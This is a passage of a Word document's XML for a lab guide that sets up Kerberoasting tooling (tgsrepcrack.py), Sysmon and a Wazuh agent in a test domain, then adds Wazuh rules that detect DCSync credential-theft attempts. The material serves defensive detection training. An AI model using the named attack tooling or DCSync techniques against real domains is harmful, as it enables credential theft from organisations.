          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Make sure Python is installed (latest version) to run tgsrepcrack.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652BED94" w14:textId="457FF86D" w:rsidR="00AA177B" w:rsidRPr="00077375" w:rsidRDefault="00AA177B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Place </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>a folder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> C:\tools\</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA177B">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Kerberoast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D761894" w14:textId="25EBC62E" w:rsidR="00077375" w:rsidRPr="000614D0" w:rsidRDefault="00077375" w:rsidP="00077375">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6699CB11" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Step 3: Prepare the Windows Domain Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35103B32" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00CC52BE">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Join the Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABBB5D8" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Make sure your Windows endpoint is joined to the domain sfm.local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3C00A7" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:t>Use domain admin credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF1D0B2" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Verify domain join by logging in with a domain account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE02830" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00CC52BE">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Create a Domain Account for Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B728617" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>This account will simulate a compromised user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338EF33A" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Assign local administrator privileges on the endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E15CDDE" w14:textId="59D0122F" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Integration ensures centralized management and that Wazuh can collect domain-level events.</w:t>
      </w:r>
      <w:r w:rsidR="00CC52BE">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>Its Allready done in previous steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7587704C" w14:textId="1E567AE7" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375"/>
    <w:p w14:paraId="67EC0BB8" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4: Install Sysmon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658A7246" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Download Sysmon</w:t>
      </w:r>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Microsoft Sysinternals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4EDEDE" w14:textId="362C931C" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Use the configuration file</w:t>
      </w:r>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> sysmonconfig.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC8B2A7" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Install Sysmon</w:t>
      </w:r>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> on both the Domain Controller and the Windows endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7A9FDD" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00CC52BE">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:t>sysmon.exe -accepteula -i sysmonconfig.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BA23B2" w14:textId="5C197D85" w:rsidR="00077375" w:rsidRPr="00AC61CB" w:rsidRDefault="00077375">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Configure Wazuh agent</w:t>
      </w:r>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> to collect Sysmon logs:</w:t>
      </w:r>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br/>
        <w:t>Edit C:\Program Files (x86)\ossec-agent\ossec.conf:</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C61CB" w14:paraId="2FD96ED5" w14:textId="77777777" w:rsidTr="00AC61CB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7B8519A9" w14:textId="77777777" w:rsidR="00AC61CB" w:rsidRDefault="00AC61CB" w:rsidP="00AC61CB">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="00077375">
              <w:lastRenderedPageBreak/>
              <w:t>&lt;localfile&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63528E17" w14:textId="0C152BC8" w:rsidR="00AC61CB" w:rsidRPr="00077375" w:rsidRDefault="00AC61CB" w:rsidP="00AC61CB">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:t>&lt;location&gt;Microsoft-Windows-Sysmon/Operational&lt;/location&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7121F3F3" w14:textId="01D424E4" w:rsidR="00AC61CB" w:rsidRPr="000614D0" w:rsidRDefault="00AC61CB" w:rsidP="00AC61CB">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="000614D0">
              <w:t>&lt;logformat&gt;eventchannel&lt;/logformat&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1545BFBD" w14:textId="01EC184C" w:rsidR="00AC61CB" w:rsidRDefault="00AC61CB" w:rsidP="00AC61CB">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
            </w:pPr>
            <w:r w:rsidRPr="000614D0">
              <w:t>&lt;/localfile&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20F81AF7" w14:textId="4BD7CD14" w:rsidR="00077375" w:rsidRPr="000614D0" w:rsidRDefault="00077375" w:rsidP="00077375">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="692F2B27" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Step 5: Configure Wazuh Server Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51976490" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00077375">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Add the following detection rules to localrules.xml on your Wazuh serv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077375" w:rsidRPr="00DC138E" w14:paraId="1D0D0636" w14:textId="77777777" w:rsidTr="00742A9D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10456" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="644ABA80" w14:textId="1E48DE19" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>group</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="9CDCFE"/>
              </w:rPr>
              <w:t>name</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:t>"security_event, windows"</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21E1BD8F" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C31D07E" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="6A9955"/>
              </w:rPr>
              <w:t>&lt;!-- Rule for detecting DCSync attacks using Windows security events --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E185ECB"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CCCCCC"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="9CDCFE"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:t>"110001"</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="9CDCFE"/>
              </w:rPr>
              <w:t>level</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:t>"12"</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17F976AD"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if_sid</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>60103</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>if_sid</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="584A9806"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system.eventID"</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>^4662$</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>field</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40B6FB77"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properties"</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1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}|{19195a5b-6da0-11d0-afd3-00c04fd930c9}</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>field</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46D9E38A"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options</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>no_full_log</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>options</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FFB00C5"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description</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>Directory Service Access. Possible DCSync attack</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>description</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B596506"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808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F8580C1" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FA94354" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="6A9955"/>
              </w:rPr>
              <w:t>&lt;!-- Rule to ignore Directory Service Access originating from machine accounts with $ in their names --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B88D7D7" w14:textId="77777777" w:rsidR="00077375" w:rsidRPr="00077375" w:rsidRDefault="00077375" w:rsidP="00077375">
            <w:pPr>
              <w:pStyle w:val="CoDe0"/>
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>rule</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="9CDCFE"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:t>"110009"</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="9CDCFE"/>
              </w:rPr>
              <w:t>level</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:t>"0"</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BCD235A"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if_sid</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>60103</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>if_sid</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37D22224"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system.eventID"</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>^4662$</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>field</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13748F08"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properties"</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1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}|{19195a5b-6da0-11d0-afd3-00c04fd930c9}</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>field</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="799FD21C"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SubjectUserName"</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w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>field</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="034C82D2"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options</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="CCCCCC"/>
              </w:rPr>
              <w:t>no_full_log</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&lt;/</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="569CD6"/>
              </w:rPr>
              <w:t>options</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29437580"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description</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00077375">
